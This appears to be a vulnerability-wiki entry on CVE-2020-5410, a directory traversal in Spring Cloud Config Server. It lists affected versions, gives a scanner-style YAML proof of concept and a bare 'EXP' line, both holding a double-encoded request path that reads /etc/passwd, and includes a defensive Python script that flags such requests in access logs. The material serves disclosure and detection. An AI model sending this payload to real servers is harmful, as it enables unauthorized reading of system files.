Spring Cloud Config Server Directory Traversal (CVE-2020-5410)

    Vulnerability overview

    Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user or attacker can send a request with a specially crafted URL, leading to a directory traversal attack.

    Affected versions

    Spring Cloud Config
    2.1.0 to 2.1.8
    2.2.0 to 2.2.2

    POC

    name: poc-yaml-spring-cloud-cve-2020-5410
    rules:
      - method: GET
        path: >-
          /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a
        expression: |
          response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
    detail:
      author: Soveless(https://github.com/Soveless)
      Affected Version: "Spring Cloud Config 2.2.x < 2.2.3, 2.1.x < 2.1.9"
      links:
        - https://xz.aliyun.com/t/7877
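On the defensive side, the POC above is easy to spot in web-server access logs once the request path is decoded properly: the `%252F` sequences are double-encoded slashes, so a single URL-decode pass (which most naive log filters do) leaves `%2F..%2F` in place and misses the `..` segments. The following Python script is an added example, not code from this wiki or from the Spring Cloud Config project. It parses constructed common-log-format lines, percent-decodes the path repeatedly until it stops changing, and flags any `..` segment; the log format, the IP addresses and the function names are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format); not real traffic.
# The first line carries the double-encoded traversal path shown in the POC above.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2020:12:00:01 +0000] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a HTTP/1.1" 200 1423
203.0.113.6 - - [10/Jun/2020:12:00:02 +0000] "GET /myapp/default HTTP/1.1" 200 512
203.0.113.7 - - [10/Jun/2020:12:00:03 +0000] "GET /..%2F..%2Fetc%2Fpasswd/a HTTP/1.1" 400 0
203.0.113.8 - - [10/Jun/2020:12:00:04 +0000] "GET /myapp/prod/master/application.yml HTTP/1.1" 200 300
"""

# Assumed log layout: client, ident, user, [timestamp], "METHOD path PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(path, max_rounds=5):
    """Percent-decode until the string stops changing (bounded to max_rounds).

    Returns (decoded_path, rounds_that_changed_it). A single-encoded %2F needs one
    round to become '/', the double-encoded %252F from the POC needs two.
    """
    decoded, rounds = path, 0
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded, rounds = nxt, rounds + 1
    return decoded, rounds


def analyze_line(line):
    """Parse one access-log line and flag a '..' segment in the fully decoded path.

    Both '/' and '\\' are treated as separators so a backslash variant is not missed.
    Returns None for lines that do not match the log format.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    raw_path = m.group('path')
    decoded, rounds = fully_decode(raw_path)
    segments = re.split(r'[/\\]', decoded)
    return {
        'ip': m.group('ip'),
        'path': raw_path,
        'decoded': decoded,
        'decode_rounds': rounds,
        'traversal': '..' in segments,
        'status': int(m.group('status')),
    }


def find_traversal_attempts(log_text):
    """Return the analysis record for every line whose decoded path contains '..'."""
    hits = []
    for line in log_text.splitlines():
        record = analyze_line(line)
        if record and record['traversal']:
            hits.append(record)
    return hits


if __name__ == '__main__':
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print(f"{hit['ip']} rounds={hit['decode_rounds']} status={hit['status']} "
              f"-> {hit['decoded']}")
```

Two fields in each record are worth triaging on: `decode_rounds` of 2 or more means the client deliberately double-encoded the path, which ordinary Spring Cloud Config clients never do, and a `status` of 200 on a flagged request means the server answered rather than rejected it, so the instance should be checked against the affected-version list above and upgraded to 2.2.3 / 2.1.9 or later.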

    EXP

    /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a